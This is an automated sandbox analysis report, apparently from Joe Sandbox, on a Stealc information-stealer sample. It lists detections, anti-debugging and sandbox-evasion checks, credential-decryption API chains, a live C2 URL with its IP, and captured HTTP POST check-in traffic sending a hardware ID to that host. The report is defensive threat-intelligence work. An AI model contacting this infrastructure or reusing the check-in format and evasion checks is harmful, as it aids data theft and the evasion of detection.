Windows Analysis Report
file.exe

Overview

General Information

Sample name: file.exe
Analysis ID: 1532902
MD5: b77c7d40ff8020c4240697847b4f5684
SHA1: 0a224a33c17ee87b76f1f83b76c36c5de12909e7
SHA256: f7b35010365b337b72e82d179783fe5165f92ffbdbf74071e44877a06c40c8a6
Tags: exe, user-Bitsight

Detection

Stealc
Score: 100
Range: 0 - 100
Whitelisted: false
Confidence: 100%

Signatures

Antivirus / Scanner detection for submitted sample
Antivirus detection for URL or domain
Detected unpacking (changes PE section rights)
Found malware configuration
Suricata IDS alerts for network traffic
Yara detected Powershell download and execute
Yara detected Stealc
AI detected suspicious sample
C2 URLs / IPs found in malware configuration
Found evasive API chain (may stop execution after checking locale)
Hides threads from debuggers
Machine Learning detection for sample
PE file contains section with special chars
Searches for specific processes (likely to inject)
Tries to detect process monitoring tools (Task Manager, Process Explorer etc.)
Tries to detect sandboxes / dynamic malware analysis system (registry check)
Tries to detect sandboxes and other dynamic analysis tools (window names)
Tries to detect virtualization through RDTSC time measurements
Tries to evade debugger and weak emulator (self modifying code)
Checks for debuggers (devices)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality to create guard pages, often used to hinder reverse engineering and debugging
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Contains functionality which may be used to detect a debugger (GetProcessHeap)
Detected potential crypto function
Entry point lies outside standard sections
Extensive use of GetProcAddress (often used to hide API calls)
Found potential string decryption / allocating functions
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
PE file contains an invalid checksum
PE file contains sections with non-standard names
Program does not show much activity (idle)
Queries the volume information (name, serial number etc) of a device
Uses 32bit PE files
Uses Microsoft's Enhanced Cryptographic Provider
Uses code obfuscation techniques (call, push, ret)

Classification

  • System is w10x64
  • file.exe (PID: 7744 cmdline: "C:\Users\user\Desktop\file.exe" MD5: B77C7D40FF8020C4240697847B4F5684)
  • cleanup
Name: Stealc
Description: Stealc is an information stealer advertised by its presumed developer Plymouth on Russian-speaking underground forums and sold as a Malware-as-a-Service since January 9, 2023. According to Plymouth's statement, Stealc is a non-resident stealer with flexible data collection settings, and its development relies on other prominent stealers: Vidar, Raccoon, Mars and Redline. Stealc is written in C and uses WinAPI functions. It mainly targets data from web browsers, extensions and desktop applications of cryptocurrency wallets, and from other applications (messengers, email clients, etc.). The malware downloads 7 legitimate third-party DLLs to collect sensitive data from web browsers, including sqlite3.dll, nss3.dll, vcruntime140.dll, mozglue.dll, freebl3.dll, softokn3.dll and msvcp140.dll. It then exfiltrates the collected information file by file to its C2 server using HTTP POST requests.
Attribution: No Attribution
Blogpost URLs: https://malpedia.caad.fkie.fraunhofer.de/details/win.stealc
{"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Yara matches (Source | Rule | Description | Author):
dump.pcap | JoeSecurity_Stealc_1 | Yara detected Stealc | Joe Security
00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
Process Memory Space: file.exe PID: 7744 | JoeSecurity_PowershellDownloadAndExecute | Yara detected Powershell download and execute | Joe Security
Process Memory Space: file.exe PID: 7744 | JoeSecurity_Stealc | Yara detected Stealc | Joe Security
0.2.file.exe.ae0000.0.unpack | JoeSecurity_Stealc | Yara detected Stealc | Joe Security

No Sigma rule has matched

Suricata alerts (Timestamp | SID | Severity | Classtype | Source IP | Source Port | Destination IP | Destination Port | Protocol):
2024-10-14T06:03:11.394808+0200 | 2044243 | 1 | Malware Command and Control Activity Detected | 192.168.2.8 | 49705 | 185.215.113.37 | 80 | TCP

                AV Detection

Source: file.exe | Avira: detected
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37/ | URL Reputation: Label: malware
Source: http://185.215.113.37 | URL Reputation: Label: malware
Source: http://185.215.113.37/e2b1563c6670f193.php | URL Reputation: Label: malware
Source: http://185.215.113.37/ws | URL Reputation: Label: malware
Source: 0.2.file.exe.ae0000.0.unpack | Malware Configuration Extractor: StealC {"C2 url": "http://185.215.113.37/e2b1563c6670f193.php", "Botnet": "doma"}
Source: Submitted Sample | Integrated Neural Analysis Model: Matched 100.0% probability
Source: file.exe | Joe Sandbox ML: detected
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEC820 lstrlen,CryptStringToBinaryA,lstrcat,lstrcat,lstrcat, 0_2_00AEC820
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE9AC0 CryptStringToBinaryA,LocalAlloc,CryptStringToBinaryA,LocalFree, 0_2_00AE9AC0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE7240 GetProcessHeap,RtlAllocateHeap,CryptUnprotectData,WideCharToMultiByte,LocalFree, 0_2_00AE7240
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE9B60 CryptUnprotectData,LocalAlloc,LocalFree, 0_2_00AE9B60
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF8EA0 CryptBinaryToStringA,GetProcessHeap,RtlAllocateHeap,CryptBinaryToStringA, 0_2_00AF8EA0
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF38B0 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,PathMatchSpecA,CoInitialize,CoUninitialize,lstrcat,lstrlen,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,wsprintfA,CopyFileA,__ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z,DeleteFileA,FindNextFileA,FindClose, 0_2_00AF38B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF4910 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AF4910
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEDA80 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose, 0_2_00AEDA80
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEE430 FindFirstFileA,StrCmpCA,StrCmpCA,FindNextFileA, 0_2_00AEE430
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEED20 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrlen,DeleteFileA,CopyFileA,FindNextFileA,FindClose, 0_2_00AEED20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF4570 GetProcessHeap,RtlAllocateHeap,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,lstrcat,lstrcat,lstrlen,lstrlen, 0_2_00AF4570
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF3EA0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose, 0_2_00AF3EA0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEF6B0 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AEF6B0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE16D0 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AE16D0
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEDE10 FindFirstFileA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,FindNextFileA,FindClose, 0_2_00AEDE10
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AEBE70 FindFirstFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,DeleteFileA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,CopyFileA,StrCmpCA,DeleteFileA,StrCmpCA,FindNextFileA,FindClose, 0_2_00AEBE70

                Networking

Source: Network traffic | Suricata IDS: 2044243 - Severity 1 - ET MALWARE [SEKOIA.IO] Win32/Stealc C2 Check-in : 192.168.2.8:49705 -> 185.215.113.37:80
Source: Malware configuration extractor | URLs: http://185.215.113.37/e2b1563c6670f193.php
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Source: global traffic | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------GHJKECAAAFHJECAAAEBF
Content-Disposition: form-data; name="hwid"

4D04236CD4534228319403
------GHJKECAAAFHJECAAAEBF
Content-Disposition: form-data; name="build"

doma
------GHJKECAAAFHJECAAAEBF--
Source: Joe Sandbox View | IP Address: 185.215.113.37
Source: Joe Sandbox View | ASN Name: WHOLESALECONNECTIONSNL
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: unknown | TCP traffic detected without corresponding DNS query: 185.215.113.37
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AE6280 InternetOpenA,StrCmpCA,InternetConnectA,HttpOpenRequestA,InternetSetOptionA,HttpSendRequestA,HttpQueryInfoA,InternetReadFile,InternetCloseHandle,InternetCloseHandle,InternetCloseHandle, 0_2_00AE6280
Source: global traffic | HTTP traffic detected:
GET / HTTP/1.1
Host: 185.215.113.37
Connection: Keep-Alive
Cache-Control: no-cache
Source: unknown | HTTP traffic detected:
POST /e2b1563c6670f193.php HTTP/1.1
Content-Type: multipart/form-data; boundary=----GHJKECAAAFHJECAAAEBF
Host: 185.215.113.37
Content-Length: 211
Connection: Keep-Alive
Cache-Control: no-cache
Data Ascii:
------GHJKECAAAFHJECAAAEBF
Content-Disposition: form-data; name="hwid"

4D04236CD4534228319403
------GHJKECAAAFHJECAAAEBF
Content-Disposition: form-data; name="build"

doma
------GHJKECAAAFHJECAAAEBF--
Source: file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37
Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/
Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp, file.exe, 00000000.00000002.1482335247.00000000017F7000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.php
Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phph~
Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpn
Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/e2b1563c6670f193.phpt~
Source: file.exe, 00000000.00000002.1482335247.00000000017D9000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37/ws
Source: file.exe, 00000000.00000002.1482335247.000000000177E000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: http://185.215.113.37a

                System Summary

Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 0_2_00EAF0E8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB784C 0_2_00EB784C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E4F124 0_2_00E4F124
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA690A 0_2_00EA690A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB0914 0_2_00EB0914
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EABAAF 0_2_00EABAAF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00FCF299 0_2_00FCF299
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E8222B 0_2_00E8222B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB23E6 0_2_00EB23E6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00F8DBDA 0_2_00F8DBDA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D9C49A 0_2_00D9C49A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA8404 0_2_00EA8404
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB8D4F 0_2_00EB8D4F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E70D20 0_2_00E70D20
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E176E3 0_2_00E176E3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E8C6B1 0_2_00E8C6B1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00E7EE63 0_2_00E7EE63
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00D7363D 0_2_00D7363D
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB57A6 0_2_00EB57A6
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EA9F65 0_2_00EA9F65
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EB477B 0_2_00EB477B
Source: C:\Users\user\Desktop\file.exe | Code function: String function: 00AE45C0 appears 316 times
Source: file.exe | Static PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: file.exe | Static PE information: Section: cxzomhko ZLIB complexity 0.994909029334828
Source: file.exe, 00000000.00000003.1441400565.00000000054B0000.00000004.00001000.00020000.00000000.sdmp, file.exe, 00000000.00000002.1481691733.0000000000AE1000.00000040.00000001.01000000.00000003.sdmp | Binary or memory string: =R.SLN6CO6A3TUV4VI7QN) U16F5V0%Q$'V<+59CPLCJJULOYXRHGLPW "53>/1
Source: classification engine | Classification label: mal100.troj.evad.winEXE@1/0@0/1
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF8680 CreateToolhelp32Snapshot,Process32First,Process32Next,CloseHandle, 0_2_00AF8680
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF3720 CoCreateInstance,MultiByteToWideChar,lstrcpyn, 0_2_00AF3720
Source: C:\Users\user\Desktop\file.exe | File created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\D81IGXZV\Q6MPI90K.htm
Source: C:\Users\user\Desktop\file.exe | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: file.exe | String found in binary or memory: 3Cannot find '%s'. Please, re-install this application
Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wininet.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: rstrtmgr.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iertutil.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: urlmon.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: srvcli.dll
Source: C:\Users\user\Desktop\file.exe | Section loaded: netutils.dll
Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0358b920-0ac7-461f-98f4-58e32cd89148}\InProcServer32
Source: file.exe | Static file information: File size 1869312 > 1048576
Source: file.exe | Static PE information: Raw size of cxzomhko is bigger than: 0x100000 < 0x1a2200

                Data Obfuscation

Source: C:\Users\user\Desktop\file.exe | Unpacked PE file: 0.2.file.exe.ae0000.0.unpack :EW;.rsrc :W;.idata :W; :EW;cxzomhko:EW;idqsnktn:EW;.taggant:EW; vs :ER;.rsrc :W;.idata :W; :EW;cxzomhko:EW;idqsnktn:EW;.taggant:EW;
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00AF9860
Source: initial sample | Static PE information: section where entry point is pointing to: .taggant
Source: file.exe | Static PE information: real checksum: 0x1ca59c should be: 0x1d19b6
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: .rsrc
Source: file.exe | Static PE information: section name: .idata
Source: file.exe | Static PE information: section name:
Source: file.exe | Static PE information: section name: cxzomhko
Source: file.exe | Static PE information: section name: idqsnktn
Source: file.exe | Static PE information: section name: .taggant
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push eax; mov dword ptr [esp], ebp 0_2_00EAF107
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push edx; mov dword ptr [esp], ebx 0_2_00EAF163
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push edx; mov dword ptr [esp], 5FAB3AFAh 0_2_00EAF2C5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 1713C6D9h; mov dword ptr [esp], edi 0_2_00EAF2FF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 013BEFD4h; mov dword ptr [esp], ebp 0_2_00EAF30B
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 44C4A3C2h; mov dword ptr [esp], edx 0_2_00EAF465
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], 7B3BE397h 0_2_00EAF4C7
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push ebx; mov dword ptr [esp], ebp 0_2_00EAF565
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 7CE1567Ah; mov dword ptr [esp], ecx 0_2_00EAF5A8
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 27246F0Eh; mov dword ptr [esp], eax 0_2_00EAF600
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 60717040h; mov dword ptr [esp], edx 0_2_00EAF61A
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 59BCB273h; mov dword ptr [esp], edx 0_2_00EAF657
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push ebx; mov dword ptr [esp], 77BFDD1Dh 0_2_00EAF721
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push eax; mov dword ptr [esp], edx 0_2_00EAF744
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 04BC6DBDh; mov dword ptr [esp], esp 0_2_00EAF74C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 0A0A505Ah; mov dword ptr [esp], ebx 0_2_00EAF783
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], 00000004h 0_2_00EAF787
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push edi; mov dword ptr [esp], edx 0_2_00EAF7B5
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push edx; mov dword ptr [esp], eax 0_2_00EAF7DE
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push eax; mov dword ptr [esp], edi 0_2_00EAF7FA
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 271B1A8Ah; mov dword ptr [esp], edi 0_2_00EAF83F
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 548123C0h; mov dword ptr [esp], ebp 0_2_00EAF85C
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], edx 0_2_00EAF868
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push eax; mov dword ptr [esp], ebx 0_2_00EAF997
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 2A731FBDh; mov dword ptr [esp], ebx 0_2_00EAF9CF
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push edi; mov dword ptr [esp], 1ED659A4h 0_2_00EAFAE4
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push edx; mov dword ptr [esp], 6B8103B8h 0_2_00EAFB81
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 193AD415h; mov dword ptr [esp], ebx 0_2_00EAFB93
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], ebx 0_2_00EAFBD3
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push 286C74EFh; mov dword ptr [esp], ebx 0_2_00EAFBFC
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00EAF0E8 push ecx; mov dword ptr [esp], 1BD12312h 0_2_00EAFC19
Source: file.exe | Static PE information: section name: cxzomhko entropy: 7.953850272412943

                Boot Survival

Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: RegmonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: FilemonClass
Source: C:\Users\user\Desktop\file.exe | Window searched: window name: PROCMON_WINDOW_CLASS
Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_00AF9860 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress, 0_2_00AF9860

                Malware Analysis System Evasion

Source: C:\Users\user\Desktop\file.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess graph_0-13646
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_CURRENT_USER\Software\Wine
Source: C:\Users\user\Desktop\file.exe | File opened: HKEY_LOCAL_MACHINE\HARDWARE\ACPI\DSDT\VBOX__
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: D42125 second address: D42129 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBDA7E second address: EBDA85 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBDA85 second address: EBDA91 instructions: 0x00000000 rdtsc 0x00000002 jo 00007F417883CDCEh 0x00000008 pushad 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBE02B second address: EBE073 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 jmp 00007F4178B56578h 0x00000008 pop esi 0x00000009 jnl 00007F4178B56572h 0x0000000f pop edx 0x00000010 pop eax 0x00000011 pushad 0x00000012 push esi 0x00000013 jmp 00007F4178B56571h 0x00000018 pop esi 0x00000019 push eax 0x0000001a push edx 0x0000001b push eax 0x0000001c push edx 0x0000001d rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBE073 second address: EBE079 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EBE1F3 second address: EBE1F7 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC029C second address: EC02A2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC02A2 second address: EC02A6 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC0352 second address: EC0378 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDD8h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [esp+04h] 0x0000000d push eax 0x0000000e push edx 0x0000000f push eax 0x00000010 push esi 0x00000011 pop esi 0x00000012 pop eax 0x00000013 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC0378 second address: EC03AD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F4178B56576h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 mov eax, dword ptr [eax] 0x0000000b jnp 00007F4178B56570h 0x00000011 mov dword ptr [esp+04h], eax 0x00000015 pushad 0x00000016 push eax 0x00000017 push edx 0x00000018 pushad 0x00000019 popad 0x0000001a rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC03AD second address: EC040C instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F417883CDCDh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 jg 00007F417883CDCCh 0x0000000f popad 0x00000010 pop eax 0x00000011 movsx edx, si 0x00000014 push 00000003h 0x00000016 mov cx, di 0x00000019 jo 00007F417883CDCCh 0x0000001f mov esi, dword ptr [ebp+122D38A1h] 0x00000025 push 00000000h 0x00000027 jmp 00007F417883CDD8h 0x0000002c push 00000003h 0x0000002e and ecx, dword ptr [ebp+122D37F1h] 0x00000034 push 99679D22h 0x00000039 push eax 0x0000003a push edx 0x0000003b pushad 0x0000003c push eax 0x0000003d push edx 0x0000003e rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC040C second address: EC0413 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\Desktop\file.exe | RDTSC instruction interceptor: First address: EC0413 second address: EC0418 instructions: 0x00000000 rdtsc 0x00000002 push edi 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
